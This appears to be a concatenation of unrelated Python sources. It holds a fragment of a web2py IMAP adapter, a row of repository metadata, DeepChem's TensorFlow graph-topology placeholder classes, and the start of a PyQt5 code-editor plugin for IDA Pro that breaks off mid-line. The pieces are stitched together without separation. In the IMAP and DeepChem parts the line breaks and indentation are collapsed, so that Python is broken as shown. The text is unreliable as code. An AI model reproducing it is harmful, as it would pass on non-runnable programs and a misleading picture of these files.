query, fields, attributes): """ Searches and Fetches records and return web2py rows """ # move this statement elsewhere (upper-level) if use_common_filters(query): query = self.common_filter(query, [self.get_query_mailbox(query),]) import email # get records from imap server with search + fetch # convert results to a dictionary tablename = None fetch_results = list() if isinstance(query, Query): tablename = self.get_table(query)._dalname mailbox = self.connection.mailbox_names.get(tablename, None) if mailbox is None: raise ValueError("Mailbox name not found: %s" % mailbox) else: # select with readonly result, selected = self.connection.select(mailbox, True) if result != "OK": raise Exception("IMAP error: %s" % selected) self.mailbox_size = int(selected[0]) search_query = "(%s)" % str(query).strip() search_result = self.connection.uid("search", None, search_query) # Normal IMAP response OK is assumed (change this) if search_result[0] == "OK": # For "light" remote server responses just get the first # ten records (change for non-experimental implementation) # However, light responses are not guaranteed with this # approach, just fewer messages. limitby = attributes.get('limitby', None) messages_set = search_result[1][0].split() # descending order messages_set.reverse() if limitby is not None: # TODO: orderby, asc/desc, limitby from complete message set messages_set = messages_set[int(limitby[0]):int(limitby[1])] # keep the requests small for header/flags if any([(field.name in ["content", "size", "attachments", "email"]) for field in fields]): imap_fields = "(RFC822 FLAGS)" else: imap_fields = "(RFC822.HEADER FLAGS)" if len(messages_set) > 0: # create fetch results object list # fetch each remote message and store it in memmory # (change to multi-fetch command syntax for faster # transactions) for uid in messages_set: # fetch the RFC822 message body typ, data = self.connection.uid("fetch", uid, imap_fields) if typ == "OK": fr = {"message": int(data[0][0].split()[0]), "uid": long(uid), "email": email.message_from_string(data[0][1]), "raw_message": data[0][1]} fr["multipart"] = fr["email"].is_multipart() # fetch flags for the message if PY2: fr["flags"] = self.driver.ParseFlags(data[1]) else: fr["flags"] = self.driver.ParseFlags( bytes(data[1], "utf-8")) fetch_results.append(fr) else: # error retrieving the message body raise Exception("IMAP error retrieving the body: %s" % data) else: raise Exception("IMAP search error: %s" % search_result[1]) elif isinstance(query, (Expression, basestring)): raise NotImplementedError() else: raise TypeError("Unexpected query type") imapqry_dict = {} imapfields_dict = {} if len(fields) == 1 and isinstance(fields[0], SQLALL): allfields = True elif len(fields) == 0: allfields = True else: allfields = False if allfields: colnames = ["%s.%s" % (tablename, field) for field in self.search_fields.keys()] else: colnames = [field.longname for field in fields] for k in colnames: imapfields_dict[k] = k imapqry_list = list() imapqry_array = list() for fr in fetch_results: attachments = [] content = [] size = 0 n = int(fr["message"]) item_dict = dict() message = fr["email"] uid = fr["uid"] charset = self.get_charset(message) flags = fr["flags"] raw_message = fr["raw_message"] # Return messages data mapping static fields # and fetched results. Mapping should be made # outside the select function (with auxiliary # instance methods) # pending: search flags states trough the email message # instances for correct output # preserve subject encoding (ASCII/quoted printable) if "%s.id" % tablename in colnames: item_dict["%s.id" % tablename] = n if "%s.created" % tablename in colnames: item_dict["%s.created" % tablename] = self.convert_date(message["Date"]) if "%s.uid" % tablename in colnames: item_dict["%s.uid" % tablename] = uid if "%s.sender" % tablename in colnames: # If there is no encoding found in the message header # force utf-8 replacing characters (change this to # module's defaults). Applies to .sender, .to, .cc and .bcc fields item_dict["%s.sender" % tablename] = message["From"] if "%s.to" % tablename in colnames: item_dict["%s.to" % tablename] = message["To"] if "%s.cc" % tablename in colnames: if "Cc" in message.keys(): item_dict["%s.cc" % tablename] = message["Cc"] else: item_dict["%s.cc" % tablename] = "" if "%s.bcc" % tablename in colnames: if "Bcc" in message.keys(): item_dict["%s.bcc" % tablename] = message["Bcc"] else: item_dict["%s.bcc" % tablename] = "" if "%s.deleted" % tablename in colnames: item_dict["%s.deleted" % tablename] = "\\Deleted" in flags if "%s.draft" % tablename in colnames: item_dict["%s.draft" % tablename] = "\\Draft" in flags if "%s.flagged" % tablename in colnames: item_dict["%s.flagged" % tablename] = "\\Flagged" in flags if "%s.recent" % tablename in colnames: item_dict["%s.recent" % tablename] = "\\Recent" in flags if "%s.seen" % tablename in colnames: item_dict["%s.seen" % tablename] = "\\Seen" in flags if "%s.subject" % tablename in colnames: item_dict["%s.subject" % tablename] = message["Subject"] if "%s.answered" % tablename in colnames: item_dict["%s.answered" % tablename] = "\\Answered" in flags if "%s.mime" % tablename in colnames: item_dict["%s.mime" % tablename] = message.get_content_type() if "%s.encoding" % tablename in colnames: item_dict["%s.encoding" % tablename] = charset # Here goes the whole RFC822 body as an email instance # for controller side custom processing # The message is stored as a raw string # >> email.message_from_string(raw string) # returns a Message object for enhanced object processing if "%s.email" % tablename in colnames: # WARNING: no encoding performed (raw message) item_dict["%s.email" % tablename] = raw_message # Size measure as suggested in a Velocity Reviews post # by Tim Williams: "how to get size of email attachment" # Note: len() and server RFC822.SIZE reports doesn't match # To retrieve the server size for representation would add a new # fetch transaction to the process for part in message.walk(): maintype = part.get_content_maintype() if ("%s.attachments" % tablename in colnames) or \ ("%s.content" % tablename in colnames): payload = part.get_payload(decode=True) if payload: filename = part.get_filename() values = {"mime": part.get_content_type()} if ((filename or not "text" in maintype) and ("%s.attachments" % tablename in colnames)): values.update({"payload": payload, "filename": filename, "encoding": part.get_content_charset(), "disposition": part["Content-Disposition"]}) attachments.append(values) elif (("text" in maintype) and ("%s.content" % tablename in colnames)): values.update({"text": self.encode_text(payload, self.get_charset(part))}) content.append(values) if "%s.size" % tablename in colnames: if part is not None: size += len(str(part)) item_dict["%s.content" % tablename] = content item_dict["%s.attachments" % tablename] = attachments item_dict["%s.size" % tablename] = size imapqry_list.append(item_dict) # extra object mapping for the sake of rows object # creation (sends an array or lists) for item_dict in imapqry_list: imapqry_array_item = list() for fieldname in colnames: imapqry_array_item.append(item_dict[fieldname]) imapqry_array.append(imapqry_array_item) # parse result and return a rows object colnames = colnames processor = attributes.get('processor',self.parse) return processor(imapqry_array, fields, colnames) def insert(self, table, fields): def add_payload(message, obj): payload = Message() encoding = obj.get("encoding", "utf-8") if encoding and (encoding.upper() in ("BASE64", "7BIT", "8BIT", "BINARY")): payload.add_header("Content-Transfer-Encoding", encoding) else: payload.set_charset(encoding) mime = obj.get("mime", None) if mime: payload.set_type(mime) if "text" in obj: payload.set_payload(obj["text"]) elif "payload" in obj: payload.set_payload(obj["payload"]) if "filename" in obj and obj["filename"]: payload.add_header("Content-Disposition", "attachment", filename=obj["filename"]) message.attach(payload) mailbox = table.mailbox d = dict(((k.name, v) for k, v in fields)) date_time = d.get("created") or datetime.datetime.now() struct_time = date_time.timetuple() if len(d) > 0: message = d.get("email", None) attachments = d.get("attachments", []) content = d.get("content", []) flags = " ".join(["\\%s" % flag.capitalize() for flag in ("answered", "deleted", "draft", "flagged", "recent", "seen") if d.get(flag, False)]) if not message: from email.message import Message mime = d.get("mime", None) charset = d.get("encoding", None) message = Message() message["from"] = d.get("sender", "") message["subject"] = d.get("subject", "") message["date"] = self.convert_date(date_time, imf=True) if mime: message.set_type(mime) if charset: message.set_charset(charset) for item in ("to", "cc", "bcc"): value = d.get(item, "") if isinstance(value, basestring): message[item] = value else: message[item] = ";".join([i for i in value]) if (not message.is_multipart() and (not message.get_content_type().startswith( "multipart"))): if isinstance(content, basestring): message.set_payload(content) elif len(content) > 0: message.set_payload(content[0]["text"]) else: [add_payload(message, c) for c in content] [add_payload(message, a) for a in attachments] message = message.as_string() result, data = self.connection.append(mailbox, flags, struct_time, message) if result == "OK": uid = int(re.findall("\d+", str(data))[-1]) return self.db(table.uid==uid).select(table.id).first().id else: raise Exception("IMAP message append failed: %s" % data) else: raise NotImplementedError("IMAP empty insert is not implemented") def update(self, table, query, fields): # TODO: the adapter should implement an .expand method commands = list() rowcount = 0 tablename = table._dalname if use_common_filters(query): query = self.common_filter(query, [tablename,]) mark = [] unmark = [] if query: for item in fields: field = item[0] name = field.name value = item[1] if self.is_flag(name): flag = self.search_fields[name] if (value is not None) and (flag != "\\Recent"): if value: mark.append(flag) else: unmark.append(flag) result, data = self.connection.select( self.connection.mailbox_names[tablename]) string_query = "(%s)" % query result, data = self.connection.search(None, string_query) store_list = [item.strip() for item in data[0].split() if item.strip().isdigit()] # build commands for marked flags for number in store_list: result = None if len(mark) > 0: commands.append((number, "+FLAGS", "(%s)" % " ".join(mark))) if len(unmark) > 0: commands.append((number, "-FLAGS", "(%s)" % " ".join(unmark))) for command in commands: result, data = self.connection.store(*command) if result == "OK": rowcount += 1 else: raise Exception("IMAP storing error: %s" % data) return rowcount def count(self,query,distinct=None): counter = 0 tablename = self.get_query_mailbox(query) if query and tablename is not None: if use_common_filters(query): query = self.common_filter(query, [tablename,]) result, data = self.connection.select(self.connection.mailbox_names[tablename]) string_query = "(%s)" % query result, data = self.connection.search(None, string_query) store_list = [item.strip() for item in data[0].split() if item.strip().isdigit()] counter = len(store_list) return counter def delete(self, table, query): counter = 0 tablename = table._dalname if query: if use_common_filters(query): query = self.common_filter(query, [tablename,]) result, data = self.connection.select(self.connection.mailbox_names[tablename]) string_query = "(%s)" % query result, data = self.connection.search(None, string_query) store_list = [item.strip() for item in data[0].split() if item.strip().isdigit()] for number in store_list: result, data = self.connection.store(number, "+FLAGS", "(\\Deleted)") if result == "OK": counter += 1 else: raise Exception("IMAP store error: %s" % data) if counter > 0: result, data = self.connection.expunge() return counter def BELONGS(self, first, second): result = None name = self.search_fields[first.name] if name == "MESSAGE": values = [str(val) for val in second if str(val).isdigit()] result = "%s" % ",".join(values).strip() elif name == "UID": values = [str(val) for val in second if str(val).isdigit()] result = "UID %s" % ",".join(values).strip() else: raise Exception("Operation not supported") # result = "(%s %s)" % (self.expand(first), self.expand(second)) return result def CONTAINS(self, first, second, case_sensitive=False): # silently ignore, only case sensitive result = None name = self.search_fields[first.name] if name in ("FROM", "TO", "SUBJECT", "TEXT"): result = "%s \"%s\"" % (name, self.expand(second)) else: if first.name in ("cc", "bcc"): result = "%s \"%s\"" % (first.name.upper(), self.expand(second)) elif first.name == "mime": result = "HEADER Content-Type \"%s\"" % self.expand(second) else: raise Exception("Operation not supported") return result def GT(self, first, second): result = None name = self.search_fields[first.name] if name == "MESSAGE": last_message = self.get_last_message(first.tablename) result = "%d:%d" % (int(self.expand(second)) + 1, last_message) elif name == "UID": # GT and LT may not return # expected sets depending on # the uid format implemented try: pedestal, threshold = self.get_uid_bounds(first.tablename) except TypeError: e = sys.exc_info()[1] self.db.logger.debug("Error requesting uid bounds: %s", str(e)) return "" try: lower_limit = int(self.expand(second)) + 1 except (ValueError, TypeError): e = sys.exc_info()[1] raise Exception("Operation not supported (non integer UID)") result = "UID %s:%s" % (lower_limit, threshold) elif name == "DATE": result = "SINCE %s" % self.convert_date(second, add=datetime.timedelta(1)) elif name == "SIZE": result = "LARGER %s" % self.expand(second) else: raise Exception("Operation not supported") return result def GE(self, first, second): result = None name = self.search_fields[first.name] if name == "MESSAGE": last_message = self.get_last_message(first.tablename) result = "%s:%s" % (self.expand(second), last_message) elif name == "UID": # GT and LT may not return # expected sets depending on # the uid format implemented try: pedestal, threshold = self.get_uid_bounds(first.tablename) except TypeError: e = sys.exc_info()[1] self.db.logger.debug("Error requesting uid bounds: %s", str(e)) return "" lower_limit = self.expand(second) result = "UID %s:%s" % (lower_limit, threshold) elif name == "DATE": result = "SINCE %s" % self.convert_date(second) else: raise Exception("Operation not supported") return result def LT(self, first, second): result = None name = self.search_fields[first.name] if name == "MESSAGE": result = "%s:%s" % (1, int(self.expand(second)) - 1) elif name == "UID": try: pedestal, threshold = self.get_uid_bounds(first.tablename) except TypeError: e = sys.exc_info()[1] self.db.logger.debug("Error requesting uid bounds: %s", str(e)) return "" try: upper_limit = int(self.expand(second)) - 1 except (ValueError, TypeError): e = sys.exc_info()[1] raise Exception("Operation not supported (non integer UID)") result = "UID %s:%s" % (pedestal, upper_limit) elif name == "DATE": result = "BEFORE %s" % self.convert_date(second) elif name == "SIZE": result = "SMALLER %s" % self.expand(second) else: raise Exception("Operation not supported") return result def LE(self, first, second): result = None name = self.search_fields[first.name] if name == "MESSAGE": result = "%s:%s" % (1, self.expand(second)) elif name == "UID": try: pedestal, threshold = self.get_uid_bounds(first.tablename) except TypeError: e = sys.exc_info()[1] self.db.logger.debug("Error requesting uid bounds: %s", str(e)) return "" upper_limit = int(self.expand(second)) result = "UID %s:%s" % (pedestal, upper_limit) elif name == "DATE": result = "BEFORE %s" % self.convert_date(second, add=datetime.timedelta(1)) else: raise Exception("Operation not supported") return result def NE(self, first, second=None): if (second is None) and isinstance(first, Field): # All records special table query if first.type == "id": return self.GE(first, 1) result = self.NOT(self.EQ(first, second)) result = result.replace("NOT NOT", "").strip() return result def EQ(self,first,second): name = self.search_fields[first.name] result = None if name is not None: if name == "MESSAGE": # query by message sequence number result = "%s" % self.expand(second) elif name == "UID": result = "UID %s" % self.expand(second) elif name == "DATE": result = "ON %s" % self.convert_date(second) elif name in self.flags.values(): if second: result = "%s" % (name.upper()[1:]) else: result = "NOT %s" % (name.upper()[1:]) else: raise Exception("Operation not supported") else: raise Exception("Operation not supported") return result def AND(self, first, second): result = "%s %s" % (self.expand(first), self.expand(second)) return result def OR(self, first, second): result = "OR %s %s" % (self.expand(first), self.expand(second)) return "%s" % result.replace("OR OR", "OR") def NOT(self, first): result = "NOT %s" % self.expand(first) return result
apache-2.0
6,151,325,805,287,477,000
39.879392
120
0.519421
false
4.500366
false
false
false
joegomes/deepchem
deepchem/models/tf_new_models/graph_topology.py
1
16190
"""Manages Placeholders for Graph convolution networks. """ from __future__ import print_function from __future__ import division from __future__ import unicode_literals __author__ = "Han Altae-Tran and Bharath Ramsundar" __copyright__ = "Copyright 2016, Stanford University" __license__ = "MIT" import numpy as np import tensorflow as tf from deepchem.nn.copy import Input from deepchem.feat.mol_graphs import ConvMol def merge_two_dicts(x, y): z = x.copy() z.update(y) return z def merge_dicts(l): """Convenience function to merge list of dictionaries.""" merged = {} for dict in l: merged = merge_two_dicts(merged, dict) return merged class GraphTopology(object): """Manages placeholders associated with batch of graphs and their topology""" def __init__(self, n_feat, name='topology', max_deg=10, min_deg=0): """ Note that batch size is not specified in a GraphTopology object. A batch of molecules must be combined into a disconnected graph and fed to topology directly to handle batches. Parameters ---------- n_feat: int Number of features per atom. name: str, optional Name of this manager. max_deg: int, optional Maximum #bonds for atoms in molecules. min_deg: int, optional Minimum #bonds for atoms in molecules. """ #self.n_atoms = n_atoms self.n_feat = n_feat self.name = name self.max_deg = max_deg self.min_deg = min_deg self.atom_features_placeholder = tensor = tf.placeholder( dtype='float32', shape=(None, self.n_feat), name=self.name + '_atom_features') self.deg_adj_lists_placeholders = [ tf.placeholder( dtype='int32', shape=(None, deg), name=self.name + '_deg_adj' + str(deg)) for deg in range(1, self.max_deg + 1) ] self.deg_slice_placeholder = tf.placeholder( dtype='int32', shape=(self.max_deg - self.min_deg + 1, 2), name=self.name + '_deg_slice') self.membership_placeholder = tf.placeholder( dtype='int32', shape=(None,), name=self.name + '_membership') # Define the list of tensors to be used as topology self.topology = [self.deg_slice_placeholder, self.membership_placeholder] self.topology += self.deg_adj_lists_placeholders self.inputs = [self.atom_features_placeholder] self.inputs += self.topology def get_input_placeholders(self): """All placeholders. Contains atom_features placeholder and topology placeholders. """ return self.inputs def get_topology_placeholders(self): """Returns topology placeholders Consists of deg_slice_placeholder, membership_placeholder, and the deg_adj_list_placeholders. """ return self.topology def get_atom_features_placeholder(self): return self.atom_features_placeholder def get_deg_adjacency_lists_placeholders(self): return self.deg_adj_lists_placeholders def get_deg_slice_placeholder(self): return self.deg_slice_placeholder def get_membership_placeholder(self): return self.membership_placeholder def batch_to_feed_dict(self, batch): """Converts the current batch of mol_graphs into tensorflow feed_dict. Assigns the graph information in array of ConvMol objects to the placeholders tensors params ------ batch : np.ndarray Array of ConvMol objects returns ------- feed_dict : dict Can be merged with other feed_dicts for input into tensorflow """ # Merge mol conv objects batch = ConvMol.agglomerate_mols(batch) atoms = batch.get_atom_features() deg_adj_lists = [ batch.deg_adj_lists[deg] for deg in range(1, self.max_deg + 1) ] # Generate dicts deg_adj_dict = dict( list(zip(self.deg_adj_lists_placeholders, deg_adj_lists))) atoms_dict = { self.atom_features_placeholder: atoms, self.deg_slice_placeholder: batch.deg_slice, self.membership_placeholder: batch.membership } return merge_dicts([atoms_dict, deg_adj_dict]) class DTNNGraphTopology(GraphTopology): """Manages placeholders associated with batch of graphs and their topology""" def __init__(self, max_n_atoms, n_distance=100, distance_min=-1., distance_max=18., name='DTNN_topology'): """ Parameters ---------- max_n_atoms: int maximum number of atoms in a molecule n_distance: int, optional granularity of distance matrix step size will be (distance_max-distance_min)/n_distance distance_min: float, optional minimum distance of atom pairs, default = -1 Angstorm distance_max: float, optional maximum distance of atom pairs, default = 18 Angstorm """ #self.n_atoms = n_atoms self.name = name self.max_n_atoms = max_n_atoms self.n_distance = n_distance self.distance_min = distance_min self.distance_max = distance_max self.atom_number_placeholder = tf.placeholder( dtype='int32', shape=(None, self.max_n_atoms), name=self.name + '_atom_number') self.atom_mask_placeholder = tf.placeholder( dtype='float32', shape=(None, self.max_n_atoms), name=self.name + '_atom_mask') self.distance_matrix_placeholder = tf.placeholder( dtype='float32', shape=(None, self.max_n_atoms, self.max_n_atoms, self.n_distance), name=self.name + '_distance_matrix') self.distance_matrix_mask_placeholder = tf.placeholder( dtype='float32', shape=(None, self.max_n_atoms, self.max_n_atoms), name=self.name + '_distance_matrix_mask') # Define the list of tensors to be used as topology self.topology = [ self.distance_matrix_placeholder, self.distance_matrix_mask_placeholder ] self.inputs = [self.atom_number_placeholder] self.inputs += self.topology def get_atom_number_placeholder(self): return self.atom_number_placeholder def get_distance_matrix_placeholder(self): return self.distance_matrix_placeholder def batch_to_feed_dict(self, batch): """Converts the current batch of Coulomb Matrix into tensorflow feed_dict. Assigns the atom number and distance info to the placeholders tensors params ------ batch : np.ndarray Array of Coulomb Matrix returns ------- feed_dict : dict Can be merged with other feed_dicts for input into tensorflow """ # Extract atom numbers atom_number = np.asarray(list(map(np.diag, batch))) atom_mask = np.sign(atom_number) atom_number = np.asarray( np.round(np.power(2 * atom_number, 1 / 2.4)), dtype=int) ZiZj = [] for molecule in atom_number: ZiZj.append(np.outer(molecule, molecule)) ZiZj = np.asarray(ZiZj) distance_matrix = np.expand_dims(batch[:], axis=3) distance_matrix = np.concatenate( [distance_matrix] * self.n_distance, axis=3) distance_matrix_mask = batch[:] for im, molecule in enumerate(batch): for ir, row in enumerate(molecule): for ie, element in enumerate(row): if element > 0 and ir != ie: # expand a float value distance to a distance vector distance_matrix[im, ir, ie, :] = self.gauss_expand( ZiZj[im, ir, ie] / element, self.n_distance, self.distance_min, self.distance_max) distance_matrix_mask[im, ir, ie] = 1 else: distance_matrix[im, ir, ie, :] = 0 distance_matrix_mask[im, ir, ie] = 0 # Generate dicts dict_DTNN = { self.atom_number_placeholder: atom_number, self.atom_mask_placeholder: atom_mask, self.distance_matrix_placeholder: distance_matrix, self.distance_matrix_mask_placeholder: distance_matrix_mask } return dict_DTNN @staticmethod def gauss_expand(distance, n_distance, distance_min, distance_max): step_size = (distance_max - distance_min) / n_distance steps = np.array([distance_min + i * step_size for i in range(n_distance)]) distance_vector = np.exp(-np.square(distance - steps) / (2 * step_size**2)) return distance_vector class DAGGraphTopology(GraphTopology): """GraphTopology for DAG models """ def __init__(self, n_feat, batch_size, name='topology', max_atoms=50): self.n_feat = n_feat self.name = name self.max_atoms = max_atoms self.batch_size = batch_size self.atom_features_placeholder = tf.placeholder( dtype='float32', shape=(self.batch_size * self.max_atoms, self.n_feat), name=self.name + '_atom_features') self.parents_placeholder = tf.placeholder( dtype='int32', shape=(self.batch_size * self.max_atoms, self.max_atoms, self.max_atoms), # molecule * atom(graph) => step => features name=self.name + '_parents') self.calculation_orders_placeholder = tf.placeholder( dtype='int32', shape=(self.batch_size * self.max_atoms, self.max_atoms), # molecule * atom(graph) => step name=self.name + '_orders') self.membership_placeholder = tf.placeholder( dtype='int32', shape=(self.batch_size * self.max_atoms), name=self.name + '_membership') # Define the list of tensors to be used as topology self.topology = [ self.parents_placeholder, self.calculation_orders_placeholder, self.membership_placeholder ] self.inputs = [self.atom_features_placeholder] self.inputs += self.topology def get_parents_placeholder(self): return self.parents_placeholder def get_calculation_orders_placeholder(self): return self.calculation_orders_placeholder def batch_to_feed_dict(self, batch): """Converts the current batch of mol_graphs into tensorflow feed_dict. Assigns the graph information in array of ConvMol objects to the placeholders tensors for DAG models params ------ batch : np.ndarray Array of ConvMol objects returns ------- feed_dict : dict Can be merged with other feed_dicts for input into tensorflow """ atoms_per_mol = [mol.get_num_atoms() for mol in batch] n_atom_features = batch[0].get_atom_features().shape[1] membership = np.concatenate( [ np.array([1] * n_atoms + [0] * (self.max_atoms - n_atoms)) for i, n_atoms in enumerate(atoms_per_mol) ], axis=0) atoms_all = [] # calculation orders for a batch of molecules parents_all = [] calculation_orders = [] for idm, mol in enumerate(batch): # padding atom features vector of each molecule with 0 atom_features_padded = np.concatenate( [ mol.get_atom_features(), np.zeros( (self.max_atoms - atoms_per_mol[idm], n_atom_features)) ], axis=0) atoms_all.append(atom_features_padded) # calculation orders for DAGs parents = mol.parents # number of DAGs should equal number of atoms assert len(parents) == atoms_per_mol[idm] parents_all.extend(parents[:]) # padding with `max_atoms` parents_all.extend([ self.max_atoms * np.ones((self.max_atoms, self.max_atoms), dtype=int) for i in range(self.max_atoms - atoms_per_mol[idm]) ]) for parent in parents: # index for an atom in `parents_all` and `atoms_all` is different, # this function changes the index from the position in current molecule(DAGs, `parents_all`) # to position in batch of molecules(`atoms_all`) # only used in tf.gather on `atom_features_placeholder` calculation_orders.append(self.index_changing(parent[:, 0], idm)) # padding with `batch_size*max_atoms` calculation_orders.extend([ self.batch_size * self.max_atoms * np.ones( (self.max_atoms,), dtype=int) for i in range(self.max_atoms - atoms_per_mol[idm]) ]) atoms_all = np.concatenate(atoms_all, axis=0) parents_all = np.stack(parents_all, axis=0) calculation_orders = np.stack(calculation_orders, axis=0) atoms_dict = { self.atom_features_placeholder: atoms_all, self.membership_placeholder: membership, self.parents_placeholder: parents_all, self.calculation_orders_placeholder: calculation_orders } return atoms_dict def index_changing(self, index, n_mol): output = np.zeros_like(index) for ide, element in enumerate(index): if element < self.max_atoms: output[ide] = element + n_mol * self.max_atoms else: output[ide] = self.batch_size * self.max_atoms return output class WeaveGraphTopology(GraphTopology): """Manages placeholders associated with batch of graphs and their topology""" def __init__(self, max_atoms, n_atom_feat, n_pair_feat, name='Weave_topology'): """ Parameters ---------- max_atoms: int maximum number of atoms in a molecule n_atom_feat: int number of basic features of each atom n_pair_feat: int number of basic features of each pair """ #self.n_atoms = n_atoms self.name = name self.max_atoms = max_atoms self.n_atom_feat = n_atom_feat self.n_pair_feat = n_pair_feat self.atom_features_placeholder = tf.placeholder( dtype='float32', shape=(None, self.max_atoms, self.n_atom_feat), name=self.name + '_atom_features') self.atom_mask_placeholder = tf.placeholder( dtype='float32', shape=(None, self.max_atoms), name=self.name + '_atom_mask') self.pair_features_placeholder = tf.placeholder( dtype='float32', shape=(None, self.max_atoms, self.max_atoms, self.n_pair_feat), name=self.name + '_pair_features') self.pair_mask_placeholder = tf.placeholder( dtype='float32', shape=(None, self.max_atoms, self.max_atoms), name=self.name + '_pair_mask') self.membership_placeholder = tf.placeholder( dtype='int32', shape=(None,), name=self.name + '_membership') # Define the list of tensors to be used as topology self.topology = [self.atom_mask_placeholder, self.pair_mask_placeholder] self.inputs = [self.atom_features_placeholder] self.inputs += self.topology def get_pair_features_placeholder(self): return self.pair_features_placeholder def batch_to_feed_dict(self, batch): """Converts the current batch of WeaveMol into tensorflow feed_dict. Assigns the atom features and pair features to the placeholders tensors params ------ batch : np.ndarray Array of WeaveMol returns ------- feed_dict : dict Can be merged with other feed_dicts for input into tensorflow """ # Extract atom numbers atom_feat = [] pair_feat = [] atom_mask = [] pair_mask = [] membership = [] max_atoms = self.max_atoms for im, mol in enumerate(batch): n_atoms = mol.get_num_atoms() atom_feat.append( np.pad(mol.get_atom_features(), ((0, max_atoms - n_atoms), (0, 0)), 'constant')) atom_mask.append( np.array([1] * n_atoms + [0] * (max_atoms - n_atoms), dtype=float)) pair_feat.append( np.pad(mol.get_pair_features(), ((0, max_atoms - n_atoms), ( 0, max_atoms - n_atoms), (0, 0)), 'constant')) pair_mask.append(np.array([[1]*n_atoms + [0]*(max_atoms-n_atoms)]*n_atoms + \ [[0]*max_atoms]*(max_atoms-n_atoms), dtype=float)) membership.extend([im] * n_atoms) atom_feat = np.stack(atom_feat) pair_feat = np.stack(pair_feat) atom_mask = np.stack(atom_mask) pair_mask = np.stack(pair_mask) membership = np.array(membership) # Generate dicts dict_DTNN = { self.atom_features_placeholder: atom_feat, self.pair_features_placeholder: pair_feat, self.atom_mask_placeholder: atom_mask, self.pair_mask_placeholder: pair_mask, self.membership_placeholder: membership } return dict_DTNN
mit
-5,590,897,651,264,117,000
31.773279
101
0.635207
false
3.732995
false
false
false
techbliss/Python_editor
7.0/plugins/Code editor/pyeditor.py
1
41135
# Created by Storm Shadow www.techbliss.org # Created by Storm Shadow www.techbliss.org print "\n" #getting the box fit print " ###################################################\n" \ " # Author Storm Shadow # \n" \ " # Hotkeys # \n" \ " # NewFile: Ctrl+N #\n" \ " # OpenFile: Ctrl+O #\n" \ " # SaveFile: Ctrl+S #\n" \ " # RunScript: Ctrl+E #\n" \ " # Undo: Ctrl+Z #\n" \ " # Redo: Ctrl+Y #\n" \ " # SelectALL: Ctrl+A #\n" \ " # Paste: Ctrl+V #\n" \ " # Font: Ctrl+F #\n" \ " # ResetFolding: Ctrl+R #\n" \ " # CircleFolding: Ctrl+C #\n" \ " # PlainFolding: Ctrl+P #\n" \ " # HEX-ray Home: Ctrl+W #\n" \ " # Ida Pro Python SDK Ctrl+I #\n" \ " # IDAPROPythonGit: Ctrl+G #\n" \ " # Author: Ctrl+B #\n" \ " # Enable Reg: Alt+E #\n" \ " # Disable Reg: Alt+D #\n" \ " # Zoom in Ctrl+Shift+ + #\n" \ " # Zoom Out Ctrl+Shift+ - #\n" \ " # Profile Code Ctrl+Shift+ E #\n" \ " ###################################################\n" \ " # IDA PRO python Editor #\n" \ " ###################################################\n" import os import sys try: dn = idaapi.idadir("plugins\\Code editor") except NameError: dn = os.getcwd() try: TemplateFile = idaapi.idadir("plugins\\Code editor\\template\\Plugin_temp") except NameError: TemplateFile = os.getcwd()+r'\\template\\Plugin_temp' sys.path.insert(0, dn) sys.path.insert(0, os.getcwd()+r'\\icons') sys.path.insert(0, os.getcwd()+r'\\template') import PyQt5 from PyQt5 import QtCore, QtGui, QtWidgets from PyQt5.Qsci import QsciScintilla, QsciLexerPython from PyQt5.QtGui import QFont, QFontMetrics, QColor from PyQt5.QtWidgets import QDialog, QMessageBox, QWizard, QWizardPage from PyQt5.QtCore import QCoreApplication plugin_path = "" if sys.platform == "win32": if hasattr(sys, "frozen"): plugin_path = os.path.join(os.path.dirname(os.path.abspath(sys.executable)), "PyQt5", "plugins") QCoreApplication.addLibraryPath(plugin_path) else: import site for dir in site.getsitepackages(): QCoreApplication.addLibraryPath(os.path.join(dir, "PyQt5", "plugins")) elif sys.platform == "darwin": plugin_path = os.path.join(QCoreApplication.getInstallPrefix(), "Resources", "plugins") if plugin_path: QCoreApplication.addLibraryPath(plugin_path) if hasattr(QtCore.Qt, 'AA_EnableHighDpiScaling'): PyQt5.QtWidgets.QApplication.setAttribute(QtCore.Qt.AA_EnableHighDpiScaling, True) if hasattr(QtCore.Qt, 'AA_UseHighDpiPixmaps'): PyQt5.QtWidgets.QApplication.setAttribute(QtCore.Qt.AA_UseHighDpiPixmaps, True) try: import ico except ImportError: import icons.ico try: import iconsmore except ImportError: import icons.iconsmore try: import icons3 except ImportError: import icons.icons3 try: import iconf except ImportError: import icons.iconf try: import icon4 except ImportError: pass try: _fromUtf8 = QtCore.QString.fromUtf8 except AttributeError: def _fromUtf8(s): return s try: _encoding = QtWidgets.QApplication.UnicodeUTF8 def _translate(context, text, disambig): return QtWidgets.QApplication.translate(context, text, disambig, _encoding) except AttributeError: def _translate(context, text, disambig): return QtWidgets.QApplication.translate(context, text, disambig) class Ui_messageformForm(QtWidgets.QWidget): def setupUi1(self, messageformForm): messageformForm.setObjectName("messageformForm") messageformForm.resize(404, 169) sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Ignored, QtWidgets.QSizePolicy.Preferred) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(messageformForm.sizePolicy().hasHeightForWidth()) messageformForm.setSizePolicy(sizePolicy) font = QtGui.QFont() font.setFamily("Consolas") messageformForm.setFont(font) icon2 = QtGui.QIcon() icon2.addPixmap(QtGui.QPixmap(":/icons/twa.gif"), QtGui.QIcon.Normal, QtGui.QIcon.Off) messageformForm.setWindowIcon(icon2) self.label = QtWidgets.QLabel(messageformForm) self.label.setGeometry(QtCore.QRect(40, 20, 341, 111)) font = QtGui.QFont() font.setPointSize(19) self.label.setFont(font) self.label.setObjectName("label") self.retranslateUi(messageformForm) QtCore.QMetaObject.connectSlotsByName(messageformForm) def retranslateUi(self, messageformForm): _translate = QtCore.QCoreApplication.translate messageformForm.setWindowTitle(_translate("messageformForm", "Soon to be fixed")) self.label.setText(_translate("messageformForm", "Soon to be fixed" )) class Ui_Wizard(QtWidgets.QWizard): def __init__(self, parent=None): super(Ui_Wizard, self).__init__(parent=None) Wizard.setObjectName("Wizard") Wizard.resize(762, 500) font = QtGui.QFont() font.setFamily("Calibri Light") Wizard.setFont(font) Wizard.setOptions(QtWidgets.QWizard.HelpButtonOnRight) self.wizardPage1 = QtWidgets.QWizardPage() font = QtGui.QFont() font.setFamily("Calibri Light") font.setPointSize(20) self.wizardPage1.setFont(font) self.wizardPage1.setObjectName("wizardPage1") self.textBrowser_2 = QtWidgets.QTextBrowser(self.wizardPage1) self.textBrowser_2.setGeometry(QtCore.QRect(130, 140, 